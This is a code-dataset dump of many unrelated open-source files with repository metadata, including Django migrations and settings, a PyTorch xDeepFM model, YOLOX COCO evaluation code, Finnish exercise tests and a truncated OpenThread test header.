# Generated by Django 1.11.3 on 2017-08-02 11:24
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('two', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField(verbose_name='\u8bc4\u8bba\u5185\u5bb9')),
('username', models.CharField(blank=True, max_length=30, null=True, verbose_name='\u7528\u6237\u540d')),
('email', models.EmailField(blank=True, max_length=50, null=True, verbose_name='\u90ae\u7bb1\u5730\u5740')),
('url', models.URLField(blank=True, max_length=100, null=True, verbose_name='\u4e2a\u4eba\u7f51\u9875\u5730\u5740')),
('date_publish', models.DateTimeField(auto_now_add=True, verbose_name='\u53d1\u5e03\u65f6\u95f4')),
],
options={
'verbose_name': '\u8bc4\u8bba',
'verbose_name_plural': '\u8bc4\u8bba',
},
),
migrations.AlterModelOptions(
name='article',
options={'ordering': ['-id'], 'verbose_name': '\u6587\u7ae0', 'verbose_name_plural': '\u6587\u7ae0'},
),
migrations.AddField(
model_name='comment',
name='article',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='two.Article', verbose_name='\u6587\u7ae0'),
),
migrations.AddField(
model_name='comment',
name='pid',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='two.Comment', verbose_name='\u7236\u7ea7\u8bc4\u8bba'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='\u7528\u6237'),
),
]
| [
"klous530.outlook.com"
] | klous530.outlook.com |
a4e3c2a78a101ae2c35ecf31315de44d777b253f | 89cd8b77ad5171c336cc60b2133fe6468a6cb53f | /Module01_CZ/day7_data_struct_str/04-代码/day7/125_字符串高级操作(判断型).py | 8f356536eabd5e44cafbc8624e413494095895a0 | [
"MIT"
] | permissive | fenglihanxiao/Python | 75178f6b6b0c53345e1ed54226ea645216572d6c | 872baf3a3a5ee42740161152605ca2b1ddf4cd30 | refs/heads/master | 2021-05-23T18:49:20.656433 | 2020-04-29T01:06:21 | 2020-04-29T01:06:21 | 253,199,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | """
演示字符串判断型操作
"""
# str1 = "\n"
# print(str1.islower())
# print(str1.isupper())
name = "张三丰"
print(name.startswith("张三"))
filename="1.jpge"
if filename.endswith(".jpg") or filename.endswith(".png") :
print("该文件是一个图片")
| [
"[email protected]"
] | |
a268ef38a2861b114ef4f65c5e31730ade40cc92 | 7f68bbb3fd328a4d6bbabecb44305987d8cbbfc4 | /django/django-intro/home/workspace/PROJECT8/movies/forms.py | 96b211b33850d9d51473be7e05a26ff57cb8c511 | [] | no_license | seunghoon2334/TIL | c84f9f9e68c8ccc7a1625222fe61f40739774730 | 51cfbad2d9b80a37b359716fca561c2a5c5b48b3 | refs/heads/master | 2022-12-18T18:20:19.210587 | 2019-11-26T03:14:23 | 2019-11-26T03:14:23 | 162,101,369 | 0 | 0 | null | 2022-11-22T03:59:16 | 2018-12-17T08:51:53 | C | UTF-8 | Python | false | false | 491 | py | from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from .models import Movie
# modelform
class MovieForm(forms.ModelForm):
class Meta:
model = Movie
fields = '__all__'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_method = 'POST'
self.helper.add_input(Submit('Submit', '제출!')) | [
"[email protected]"
] | |
5837d24747eb111593c4fdc4fdb16c2048efb91e | d3e6d6555b0314936902727af36de2f1b7432bf8 | /linked-list-cycle/linked-list-cycle.py | af4d1032682c25c061b7019097dc1288fceab653 | [] | no_license | fly2rain/LeetCode | 624b1e06e1aa3174dfb5c81834b58cc8fd7ad073 | 4ddb5a051c6e2051f016a675fd2f5d566c800c2a | refs/heads/master | 2021-01-18T03:12:22.402044 | 2015-12-28T04:31:19 | 2015-12-28T04:31:19 | 85,842,050 | 0 | 1 | null | 2017-03-22T15:05:20 | 2017-03-22T15:05:19 | null | UTF-8 | Python | false | false | 771 | py |
from utils import ListNode
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head:
return False
prev, current = head, head.next
head.next = None
while current:
if current == head:
return True
next = current.next
current.next = prev
prev, current = current, next
return False
if __name__ == '__main__':
head = ListNode.build_linked_list([1, 2, 3, 4, 5])
head.next.next.next.next = head.next.next
print Solution().hasCycle(head)
head2 = ListNode.build_linked_list([1, 2, 3, 4, 5])
print Solution().hasCycle(head2)
print Solution().hasCycle(None) | [
"[email protected]"
] | |
d313ac27c05892907d934359fa7a177b2f5f2fff | 633944f913050debf0764c2a29cf3e88f912670e | /v8/depot_tools/bootstrap-3.8.0b1.chromium.1_bin/python3/lib/python3.8/site-packages/pip/_internal/vcs/__init__.py | 4b25ec2e4255710878140a71bd637c31b9cea887 | [
"BSD-3-Clause",
"bzip2-1.0.6",
"SunPro",
"Apache-2.0"
] | permissive | bopopescu/V8-lgtm | 0474c2ff39baf754f556ef57619ceae93e7320fd | da307e2f7abfca5fa0e860a809de6cd07fd1b72b | refs/heads/master | 2022-02-16T19:10:54.008520 | 2019-09-25T07:51:13 | 2019-09-25T07:51:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | ../../../../../../../.cipd/pkgs/2/_current/lib/python3.8/site-packages/pip/_internal/vcs/__init__.py | [
"[email protected]"
] | |
31a9922a9cadf18a73fa0c106cd377bfb6696751 | 08a68e32dc80f99a37a30ddbbf943337546cc3d5 | /.history/count/urls_20200419191412.py | 5d8ed271bfc7e1cb0268e075f7a2e8934d978eed | [] | no_license | Space20001/word-count-project | dff1b4b44d2f7230070eef0d95dd968b655d92f7 | 795b5e8ad5c59109e96bf7a8e9192efaefa7770e | refs/heads/master | 2022-04-20T17:54:05.511449 | 2020-04-20T15:25:46 | 2020-04-20T15:25:46 | 257,327,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.home),
path('', views.about),
]
| [
"[email protected]"
] | |
d3ef5ccaa99988559bd5fde97a0082c970a270a1 | 1548ce77537dcd50ab04b0eaee050b5d30553e23 | /autotabular/algorithms/ctr/xdfm.py | 003e7cba0a5433e271cb0403bed753da731ebcad | [
"Apache-2.0"
] | permissive | Shamoo100/AutoTabular | 4a20e349104246bf825ebceae33dca0a79928f2e | 7d71bf01d2b7d84fcf5f65c9f45c5cea1255d8a2 | refs/heads/main | 2023-08-13T21:34:34.329888 | 2021-10-02T07:06:00 | 2021-10-02T07:06:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,338 | py | import torch
from autotabular.algorithms.ctr.layer import CompressedInteractionNetwork, FeaturesEmbedding, FeaturesLinear, MultiLayerPerceptron
class ExtremeDeepFactorizationMachineModel(torch.nn.Module):
"""A pytorch implementation of xDeepFM.
Reference:
J Lian, et al. xDeepFM: Combining Explicit and Implicit Feature Interactions for Recommender Systems, 2018.
"""
def __init__(self,
field_dims,
embed_dim,
mlp_dims,
dropout,
cross_layer_sizes,
split_half=True):
super().__init__()
self.embedding = FeaturesEmbedding(field_dims, embed_dim)
self.embed_output_dim = len(field_dims) * embed_dim
self.cin = CompressedInteractionNetwork(
len(field_dims), cross_layer_sizes, split_half)
self.mlp = MultiLayerPerceptron(self.embed_output_dim, mlp_dims,
dropout)
self.linear = FeaturesLinear(field_dims)
def forward(self, x):
"""
:param x: Long tensor of size ``(batch_size, num_fields)``
"""
embed_x = self.embedding(x)
x = self.linear(x) + self.cin(embed_x) + self.mlp(
embed_x.view(-1, self.embed_output_dim))
return torch.sigmoid(x.squeeze(1))
| [
"[email protected]"
] | |
ba4a59497f41ffefe8c698f0a65012b2d35d88e6 | b5aeb0f8b8efc77d77842237a80cce90e529ac5f | /config/settings.py | 04b0faaaab467f76b64edc86c9631e42ab3f4de5 | [] | no_license | Pillin/POC-Django-Cooker | b078502d403a90cc57c4691265235ce855c8d75e | e6ad88564d3045af4a418234a927970f928e3c58 | refs/heads/master | 2022-12-12T15:02:41.410674 | 2019-09-30T03:41:28 | 2019-09-30T03:41:28 | 210,078,139 | 1 | 0 | null | 2022-12-08T05:22:06 | 2019-09-22T02:13:33 | Python | UTF-8 | Python | false | false | 4,361 | py | """
Django settings for nora project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ENV = environ.Env()
ENV.read_env(os.path.join(BASE_DIR, '.env'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ENV('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = ENV('DEBUG')
ALLOWED_HOSTS = []
BASE_URL = ENV('BASE_URL')
# Application definition
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'django_extensions',
'users',
'commons',
'meals',
'tags',
'plates',
'menus',
'distributions',
'deliveries'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
}
# Authentication Settings
AUTH_USER_MODEL = 'users.User'
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
]
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': ENV.db()
}
DATABASES['default']['TEST'] = {
'NAME': 'nora_test'
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'es-cl'
TIME_ZONE = 'Etc/GMT+4'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
CSRF_USE_SESSIONS = True
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = '/home/'
LOGIN_URL = '/login/'
CSRF_COOKIE_SECURE = True
DATE_FORMAT = '%d/%m/%Y'
TIME_FORMAT = '%H:%M:%S'
SLACK_SERVICE_URL = 'https://hooks.slack.com/services/'
# CELERY COMFIGURATION
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Etc/GMT+4'
CELERY_ALWAYS_EAGER = False
| [
"[email protected]"
] | |
e569fc7fc6e893e1d228b1d7e4971dcb65008fb8 | 45cc3880f3444276cebb0a7f91d3b146cd27b9d0 | /beeprint/printer.py | 63fe4de1510c7695ba066e8687e34780d93a7b3e | [] | no_license | aijikl/beeprint | 056aa84ff73da93c50143c83bed0fdf54bd37ee5 | 0380a942c0ad56ab219a51c728b4244a9b49f405 | refs/heads/master | 2021-01-20T04:25:26.858124 | 2017-04-04T06:50:36 | 2017-04-04T06:50:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,603 | py | # -*- coding:utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import division
import sys
import traceback
import types
import inspect
from io import StringIO
from .utils import pyv
if pyv == 2:
# avoid throw [UnicodeEncodeError: 'ascii' codec can't encode characters]
# exceptions, without these lines, the sys.getdefaultencoding() returns ascii
from imp import reload
reload(sys)
sys.setdefaultencoding('utf-8')
from . import constants as C
from .utils import print_exc_plus
from .models.block import Block, Context
from .config import Config
from .debug_kit import print_obj_path
def pp(o, output=True, max_depth=5, indent=2, width=80, sort_keys=True, config=None, **kwargs):
"""print data beautifully
"""
if config:
config = config.clone()
else:
config = Config()
assert max_depth > 0
config.max_depth = max_depth
assert indent > 0
config.indent_char = u' '*indent
assert width >= 0
config.string_break_width = width
config.dict_ordered_key_enable = bool(sort_keys)
for k, v in kwargs.items():
if getattr(config, k):
setattr(config, k, v)
if not output:
config.stream = None
try:
res = str(Block(config, Context(obj=o)))
except:
print_obj_path()
raise
if config.debug_level != 0:
if config.debug_delay:
print(config.debug_stream.getvalue())
if not output:
return res
| [
"[email protected]"
] | |
fcaf8123dd2fd421f5fc4ee011401898730fd1c1 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/11114095.py | 04981cbb389888968150d038dc6a792df1581176 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,637 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/11114095.py generated: Wed, 25 Jan 2017 15:25:18
#
# Event Type: 11114095
#
# ASCII decay Descriptor: [B0 -> K+ pi- (Higgs0 -> mu+ mu-)]cc
#
from Configurables import Generation
Generation().EventType = 11114095
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bd_KpiDarkBoson2MuMu,m=250MeV,t=100ps,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 511,-511 ]
from Gauss.Configuration import *
from Configurables import LHCb__ParticlePropertySvc as ParticlePropertySvc
from Configurables import Gauss, PrintMCTree, PrintMCDecayTreeTool, HistogramPersistencySvc, NTupleSvc, DumpHepMCDecay, DumpHepMCTree, GaussMonitor__CheckLifeTimeHepMC, GaussMonitor__CheckLifeTimeMC, GiGa, GiGaPhysListModular, GiGaHiggsParticles, GenerationToSimulation, PythiaProduction
ParticlePropertySvc().Particles = [ "H_10 87 25 0.0 0.250 1.0000e-10 Higgs0 25 0.000000e+000" ]
ApplicationMgr().ExtSvc += [ ParticlePropertySvc() ]
gigaHiggsPart = GiGaHiggsParticles()
gigaHiggsPart.Higgses = ["H_10"] # H_10, H_20, H_30
GiGaPhysListModular("ModularPL").PhysicsConstructors += [ gigaHiggsPart ]#
| [
"[email protected]"
] | |
56fcd9d7569cd87ba0cc217a1be8e88301bac6f5 | 361ac3fcf36d80c792b60b7e2284cb1dc8d77944 | /osa03-16_sanojen_ensimmaiset_kirjaimet/test/test_sanojen_ensimmaiset_kirjaimet.py | bd5cdde1c62e7f1ca35d82db216518e44c552e43 | [] | no_license | darkismus/mooc-ohjelmointi-21 | 48cc20391db4240104549d4f3834a67c77976f6d | 5f72dd9cff78704a2a0f5bc1cc18c7740ce50c51 | refs/heads/main | 2023-08-01T03:35:13.244978 | 2021-09-14T10:49:37 | 2021-09-14T10:49:37 | 368,469,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,507 | py | import unittest
from unittest.mock import patch
from tmc import points
from tmc.utils import load_module, reload_module, get_stdout
from functools import reduce
exercise = 'src.sanojen_ensimmaiset_kirjaimet'
def outputs_equal(str1 : str, str2 : str) -> bool:
return str1.lower() == str2.lower()
def get_correct(s : str) -> str:
return "\n".join([x[0] for x in s.split()])
@points('3.sanojen_ensimmaiset_kirjaimet')
class SanojenEnsimmaisetKirjaimetTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with patch('builtins.input', return_value = "x"):
cls.module = load_module(exercise, 'fi')
def test_lyhyet_lauseet(self):
words = ["Heipparallaa", "Terve kaikille", "Moi vaan kaikille", "Simsalabim, sanoi taikuri",
"Mitäpä tässä hötkyilemään", "Vielä yksi testilause tässä"]
for testcase in words:
with patch('builtins.input', return_value = testcase):
try:
reload_module(self.module)
except:
self.assertFalse(True, f"varmista että ohjelmasti toimii syötteellä\n{testcase}")
output_all = get_stdout()
output = [x.strip() for x in output_all.split("\n") if len(x.strip()) > 0]
correct = get_correct(testcase)
len_correct = len(correct.split("\n"))
self.assertFalse(len(output_all)==0, "Ohjelmasi ei tulosta mitään syötteellä " + testcase)
self.assertTrue(len(output) == len_correct, "Ohjelmasi tulostaa syötteellä ({}) {} rivin sijasta {} riviä: \n{}".
format(testcase, len_correct, len(output), output_all))
self.assertTrue(outputs_equal(output_all, correct),
"Ohjelmasi tuloste\n{}\nei vastaa oikeaa tulostetta \n{} \nsyötteellä ({})".
format(output_all, correct, testcase))
def test_pidemmat_lauseet(self):
words = ["Mitäpä tässä turhia jaarittelemaan, vaan jaarittelenpa tovin sittenkin.",
"Tässäpä vähän pidempi testilause: nähdään samantien miten hyvin ohjelma toimii",
"Otetaanpa vielä yksi testi tähän loppuun: tässä lauseessa onkin aika paljon sanoja."]
for testcase in words:
with patch('builtins.input', return_value = testcase):
try:
reload_module(self.module)
except:
self.assertFalse(True, f"varmista että ohjelmasti toimii syötteellä\n{testcase}")
output_all = get_stdout()
output = [x.strip() for x in output_all.split("\n") if len(x.strip()) > 0]
correct = get_correct(testcase)
len_correct = len(correct.split("\n"))
self.assertFalse(len(output_all)==0, "Ohjelmasi ei tulosta mitään syötteellä " + testcase)
self.assertTrue(len(output) == len_correct, "Ohjelmasi tulostaa syötteellä ({}) {} rivin sijasta {} riviä: \n{}".
format(testcase, len_correct, len(output), output_all))
self.assertTrue(outputs_equal(output_all, correct),
"Ohjelmasi tuloste\n{}\nei vastaa oikeaa tulostetta \n{} \nsyötteellä ({})".
format(output_all, correct, testcase))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
0519b9a6c3d736fd51361e9def7cf66c291409c5 | 915ac708aeac53125f29bef90c2c047eaed4940e | /Anaconda/Scripts/rst2xetex.py | 2d9179a588e56dbef11208ccd0ed3621286f9cc3 | [] | no_license | bopopescu/newGitTest | c8c480ddd585ef416a5ccb63cbc43e3019f92534 | 5a19f7d01d417a34170a8f760a76e6a8bb7c9274 | refs/heads/master | 2021-05-31T17:00:26.656450 | 2016-06-08T06:43:52 | 2016-06-08T06:43:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | #!C:\aroot\stage\python.exe
# $Id: rst2xetex.py 7038 2011-05-19 09:12:02Z milde $
# Author: Guenter Milde
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing XeLaTeX source code.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates XeLaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='xetex', description=description)
| [
"[email protected]"
] | |
48f6fab3b18bb1659f37d45e12c7ea01398ed32a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_bunts.py | 41d450a12d291732d8830616446e29d1957fe2d2 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py |
#calss header
class _BUNTS():
def __init__(self,):
self.name = "BUNTS"
self.definitions = bunt
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['bunt']
| [
"[email protected]"
] | |
e662722fad68cff102487d6ba08454d41807ad11 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/detection/YOLOX_Dynamic_ID4069_for_PyTorch/yolox/layers/fast_coco_eval_api.py | 55bfa28a1c06813d48ff90862908a7655239001e | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 6,464 | py |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# This file comes from
# https://github.com/facebookresearch/detectron2/blob/master/detectron2/evaluation/fast_eval_api.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# Copyright (c) Megvii Inc. All rights reserved.
import copy
import time
import numpy as np
from pycocotools.cocoeval import COCOeval
from .jit_ops import FastCOCOEvalOp
class COCOeval_opt(COCOeval):
"""
This is a slightly modified version of the original COCO API, where the functions evaluateImg()
and accumulate() are implemented in C++ to speedup evaluation
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.module = FastCOCOEvalOp().load()
def evaluate(self):
"""
Run per image evaluation on given images and store results in self.evalImgs_cpp, a
datastructure that isn't readable from Python but is used by a c++ implementation of
accumulate(). Unlike the original COCO PythonAPI, we don't populate the datastructure
self.evalImgs because this datastructure is a computational bottleneck.
:return: None
"""
tic = time.time()
print("Running per image evaluation...")
p = self.params
# add backward compatibility if useSegm is specified in params
if p.useSegm is not None:
p.iouType = "segm" if p.useSegm == 1 else "bbox"
print(
"useSegm (deprecated) is not None. Running {} evaluation".format(
p.iouType
)
)
print("Evaluate annotation type *{}*".format(p.iouType))
p.imgIds = list(np.unique(p.imgIds))
if p.useCats:
p.catIds = list(np.unique(p.catIds))
p.maxDets = sorted(p.maxDets)
self.params = p
self._prepare()
# loop through images, area range, max detection number
catIds = p.catIds if p.useCats else [-1]
if p.iouType == "segm" or p.iouType == "bbox":
computeIoU = self.computeIoU
elif p.iouType == "keypoints":
computeIoU = self.computeOks
self.ious = {
(imgId, catId): computeIoU(imgId, catId)
for imgId in p.imgIds
for catId in catIds
}
maxDet = p.maxDets[-1]
# <<<< Beginning of code differences with original COCO API
def convert_instances_to_cpp(instances, is_det=False):
# Convert annotations for a list of instances in an image to a format that's fast
# to access in C++
instances_cpp = []
for instance in instances:
instance_cpp = self.module.InstanceAnnotation(
int(instance["id"]),
instance["score"] if is_det else instance.get("score", 0.0),
instance["area"],
bool(instance.get("iscrowd", 0)),
bool(instance.get("ignore", 0)),
)
instances_cpp.append(instance_cpp)
return instances_cpp
# Convert GT annotations, detections, and IOUs to a format that's fast to access in C++
ground_truth_instances = [
[convert_instances_to_cpp(self._gts[imgId, catId]) for catId in p.catIds]
for imgId in p.imgIds
]
detected_instances = [
[
convert_instances_to_cpp(self._dts[imgId, catId], is_det=True)
for catId in p.catIds
]
for imgId in p.imgIds
]
ious = [[self.ious[imgId, catId] for catId in catIds] for imgId in p.imgIds]
if not p.useCats:
# For each image, flatten per-category lists into a single list
ground_truth_instances = [
[[o for c in i for o in c]] for i in ground_truth_instances
]
detected_instances = [
[[o for c in i for o in c]] for i in detected_instances
]
# Call C++ implementation of self.evaluateImgs()
self._evalImgs_cpp = self.module.COCOevalEvaluateImages(
p.areaRng,
maxDet,
p.iouThrs,
ious,
ground_truth_instances,
detected_instances,
)
self._evalImgs = None
self._paramsEval = copy.deepcopy(self.params)
toc = time.time()
print("COCOeval_opt.evaluate() finished in {:0.2f} seconds.".format(toc - tic))
# >>>> End of code differences with original COCO API
def accumulate(self):
"""
Accumulate per image evaluation results and store the result in self.eval. Does not
support changing parameter settings from those used by self.evaluate()
"""
print("Accumulating evaluation results...")
tic = time.time()
if not hasattr(self, "_evalImgs_cpp"):
print("Please run evaluate() first")
self.eval = self.module.COCOevalAccumulate(self._paramsEval, self._evalImgs_cpp)
# recall is num_iou_thresholds X num_categories X num_area_ranges X num_max_detections
self.eval["recall"] = np.array(self.eval["recall"]).reshape(
self.eval["counts"][:1] + self.eval["counts"][2:]
)
# precision and scores are num_iou_thresholds X num_recall_thresholds X num_categories X
# num_area_ranges X num_max_detections
self.eval["precision"] = np.array(self.eval["precision"]).reshape(
self.eval["counts"]
)
self.eval["scores"] = np.array(self.eval["scores"]).reshape(self.eval["counts"])
toc = time.time()
print(
"COCOeval_opt.accumulate() finished in {:0.2f} seconds.".format(toc - tic)
)
| [
"[email protected]"
] | |
fe484f2dbfa7363e12c93e00a34759692e113a73 | f4b8c90c1349c8740c1805f7b6b0e15eb5db7f41 | /test/test_term_session_item.py | 7867f29a7aa4a6fd2bb993565b40f161db7abf86 | [] | no_license | CalPolyResDev/StarRezAPI | 012fb8351159f96a81352d6c7bfa36cd2d7df13c | b184e1863c37ff4fcf7a05509ad8ea8ba825b367 | refs/heads/master | 2021-01-25T10:29:37.966602 | 2018-03-15T01:01:35 | 2018-03-15T01:01:35 | 123,355,501 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | # coding: utf-8
"""
StarRez API
This is a way to connect with the StarRez API. We are not the developers of the StarRez API, we are just an organization that uses it and wanted a better way to connect to it. # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import starrez_client
from starrez_client.models.term_session_item import TermSessionItem # noqa: E501
from starrez_client.rest import ApiException
class TestTermSessionItem(unittest.TestCase):
"""TermSessionItem unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTermSessionItem(self):
"""Test TermSessionItem"""
# FIXME: construct object with mandatory attributes with example values
# model = starrez_client.models.term_session_item.TermSessionItem() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
2f9bdc29452a2db1226f3a1ca5aab9fbdac5e5d6 | 6d0364f7aca2ea76444299d84d467a55b8dfabde | /tests/toranj/test-100-mcu-power-state.py | 4cba5896a9f0a28e51ca54be48ff0350a5037d02 | [
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause"
] | permissive | particle-iot/openthread | b862853867a75a591bcb3dae8f70c2ac9c35eaba | 668256290d1c48319b0b96d41559efb48dcc0821 | refs/heads/master | 2020-03-13T13:02:45.358306 | 2019-07-09T11:38:23 | 2019-07-09T11:38:23 | 131,131,221 | 1 | 0 | BSD-3-Clause | 2019-05-19T03:42:57 | 2018-04-26T09:19:12 | C++ | UTF-8 | Python | false | false | 9,901 | py | #!/usr/bin/env python
#
# Copyright (c) 2018, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
